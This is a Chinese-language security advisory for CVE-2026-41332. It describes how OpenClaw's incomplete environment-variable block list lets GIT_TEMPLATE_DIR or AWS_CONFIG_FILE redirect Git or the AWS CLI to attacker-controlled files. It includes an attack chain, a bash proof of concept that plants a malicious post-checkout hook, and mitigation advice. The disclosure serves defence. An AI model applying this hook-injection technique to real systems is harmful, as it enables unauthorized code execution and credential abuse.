IPBUF安全漏洞报告
English
CVE-2026-41332 CVSS 5.3 中危

CVE-2026-41332 OpenClaw环境变量清洗缺失代码执行漏洞

披露日期: 2026-04-23
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-41332
漏洞类型
代码执行
CVSS评分
5.3 中危
攻击向量
本地 (AV:L)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
OpenClaw

相关标签

代码执行环境变量注入OpenClaw本地攻击CVE-2026-41332

漏洞概述

OpenClaw在2026.3.28之前的版本中存在环境变量清洗漏洞。由于其主机环境变量阻止列表未包含GIT_TEMPLATE_DIR和AWS_CONFIG_FILE,攻击者可以通过利用已批准的exec请求,重定向Git或AWS CLI的行为。通过攻击者控制的配置文件,攻击者能够执行不受信任的代码或加载恶意凭据,从而影响系统的机密性和完整性。

技术细节

该漏洞源于OpenClaw在环境变量清洗机制上的设计缺陷。尽管系统试图通过阻止列表来限制敏感环境变量的传递,但未能覆盖`GIT_TEMPLATE_DIR`(用于指定Git模板目录)和`AWS_CONFIG_FILE`(用于指定AWS CLI配置文件路径)。攻击者若拥有低权限本地访问权限,可利用这一疏漏,在执行exec请求时注入这些特定的环境变量,将其指向攻击者可控的恶意目录或文件。当OpenClaw触发Git操作时,Git会根据`GIT_TEMPLATE_DIR`加载自定义模板,若其中包含恶意的钩子脚本,将在特定事件(如checkout)触发时自动执行任意代码。同样,通过`AWS_CONFIG_FILE`加载恶意配置可导致AWS CLI执行未授权操作或泄露凭证。此攻击链无需用户交互即可完成。

攻击链分析

STEP 1
步骤1:获取本地访问权限
攻击者获得目标系统上OpenClaw的低权限本地访问能力(PR:L)。
STEP 2
步骤2:准备恶意环境
攻击者创建包含恶意钩子脚本的Git模板目录或AWS配置文件,并将其放置在可控路径下。
STEP 3
步骤3:注入环境变量
攻击者利用OpenClaw的exec请求接口,设置未受阻止的环境变量GIT_TEMPLATE_DIR或AWS_CONFIG_FILE指向恶意路径。
STEP 4
步骤4:触发命令执行
当OpenClaw调用Git或AWS CLI工具时,工具自动加载攻击者指定的配置,触发恶意脚本执行或加载恶意凭证。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
#!/bin/bash # PoC for CVE-2026-41332: OpenClaw Env Variable Sanitization Bypass # This script demonstrates how an attacker can leverage GIT_TEMPLATE_DIR # to achieve arbitrary code execution via OpenClaw's exec request. # 1. Create a malicious git template directory with a post-checkout hook mkdir -p /tmp/evil_git_template/hooks cat <<EOF > /tmp/evil_git_template/hooks/post-checkout #!/bin/bash # Malicious payload execution echo "[+] PoC Executed: Code execution via CVE-2026-41332" > /tmp/poc_success.txt whoami >> /tmp/poc_success.txt EOF chmod +x /tmp/evil_git_template/hooks/post-checkout # 2. Set the environment variable not blocked by OpenClaw export GIT_TEMPLATE_DIR=/tmp/evil_git_template # 3. Simulate the vulnerable exec request (OpenClaw calling git) # In a real scenario, this would be triggered through the application's workflow git init /tmp/test_repo cd /tmp/test_repo git config user.email "[email protected]" git config user.name "test" touch test.txt git add test.txt git commit -m "test" # 4. Trigger the hook (e.g., by checking out a branch) git checkout -b trigger_payload # 5. Verify execution if [ -f /tmp/poc_success.txt ]; then echo "[!] Exploit successful!" cat /tmp/poc_success.txt else echo "[-] Exploit failed." fi

影响范围

OpenClaw < 2026.3.28

防御指南

临时缓解措施
在未完成版本升级前,建议管理员通过系统级访问控制策略(如SELinux或AppArmor)限制OpenClaw进程对Git和AWS CLI工具的调用,或严格限制其文件系统访问权限,防止加载非标准路径下的配置文件。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表